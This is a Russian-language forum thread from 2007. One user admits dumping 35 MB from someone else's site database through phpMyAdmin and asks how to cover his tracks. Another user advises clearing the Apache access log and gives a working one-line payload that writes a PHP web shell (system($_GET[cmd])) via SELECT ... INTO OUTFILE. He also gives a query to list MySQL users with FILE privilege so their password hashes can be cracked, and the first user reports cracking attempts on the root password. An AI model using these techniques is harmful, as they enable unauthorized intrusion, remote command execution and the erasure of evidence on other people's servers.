Как замести следы пользования phpmyadmina?
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Как замести следы пользования phpmyadmina? - 2007-05-05 13:01:44.020000
|
|
|
kashalot
Сообщений: 30
Оценки: 0
Присоединился: 2007-02-28 21:30:41.783333
|
всем привет!
через phpmyadmin задампил вчера 35Mb через прокси. Страница серьёзная, и хотя я проксю предварительно проверил на передачу ip и referrer, хочетса всетаки хоть часть следов замести.
Могу я что-то почистить через phpmyadmin или нужен шелл?
Прошу не отсылать на гооглю, просто может кто-то на лету сможет ответить :)
|
|
|
|
|
RE: Как замести следы пользования phpmyadmina? - 2007-05-05 23:17:12.006666
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
phpmyadmin вроде сам по себе логов не ведет. лучше почисти access_log у apache
|
|
|
|
|
RE: Как замести следы пользования phpmyadmina? - 2007-05-06 21:44:59.576666
|
|
|
kashalot
Сообщений: 30
Оценки: 0
Присоединился: 2007-02-28 21:30:41.783333
|
спасибо за быстрый ответ,
ну, смотрел папку от phpmyadmina и ничего похожего на логфаилы не нашел, придется шелл добывать.
Благо рутный пасс в дб оказался, надо только расколоть ;)
|
|
|
|
|
RE: Как замести следы пользования phpmyadmina? - 2007-05-08 19:37:46.326666
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
есть способы проще. ты знаешь о таких вещах, как load_file в mysql(и соответственно select … into outfile для записи в файл) ?
|
|
|
|
|
RE: Как замести следы пользования phpmyadmina? - 2007-05-08 20:09:50.510000
|
|
|
kashalot
Сообщений: 30
Оценки: 0
Присоединился: 2007-02-28 21:30:41.783333
|
точно, сегодня вечером попробую - если он(логфаил) мне на read/write доступен будет. А то что-то каин уже вспотел :)
|
|
|
|
|
RE: Как замести следы пользования phpmyadmina? - 2007-05-08 20:20:38.330000
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
ты не фтыкнул. с помощью into outfile ты на лог-файлы повлиять не сможешь. с помощью этого можно залить шелл, если знаешь полный путь к какой-нибудь директории на www, доступной для записи
|
|
|
|
|
RE: Как замести следы пользования phpmyadmina? - 2007-05-09 02:03:53.280000
|
|
|
kashalot
Сообщений: 30
Оценки: 0
Присоединился: 2007-02-28 21:30:41.783333
|
теперь "фтыкнул" :) Спасибо за совет, будем работать. Путь знаю, насчет доступа на запись - будем искать.
|
|
|
|
|
RE: Как замести следы пользования phpmyadmina? - 2007-05-09 12:00:31.703333
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
Не забудь: стандартный баг. когда пишешь select … into outfile '/path/file.php' нужно обязательно юзать в выборке какую-нибудь таблицу(возможно в каких-то версиях mysql можно и без этого, но в большинстве нужно именно так), например, select '<?php system($_GET[cmd]);?>' from mysql.user into outfile '/path/file.php'
еще учти, что mysql не умеет перезаписывать существующие файлы, какие бы атрибуты на них не стояли
С праздником!
|
|
|
|
|
RE: Как замести следы пользования phpmyadmina? - 2007-05-09 12:12:05.056666
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
Сорри, я ступил вероятно. Под каким юзером mysql у тебя доступ в phpmyadmin? вполне возможно, что у тебя нету привилегий записывать в файл. тогда просто пиши
select user,password,host from mysql.user where FILE_PRIV='Y' (надеюсь у тебя к mysql.user доступ есть)
а далее расшифровывай любой пасс и если host='localhost' или host='%', то фтыкай user:password в phpmyadmin…
|
|
|
|
|
RE: Как замести следы пользования phpmyadmina? - 2007-05-09 13:29:58.520000
|
|
|
kashalot
Сообщений: 30
Оценки: 0
Присоединился: 2007-02-28 21:30:41.783333
|
Сначала естестенно с праздником!
насчет команд я просек - поэксперементировал еще с домашнеу базой :)
все юзеры у меня естъ, вот только тот с которым я в phpmyadmin выхожу не имеет File_priv.
Юзиков с File_priv нашел - только ломать осталось. С root не прокатило пока, может с етими гавриками повезет …
|
|
|
|
|
|
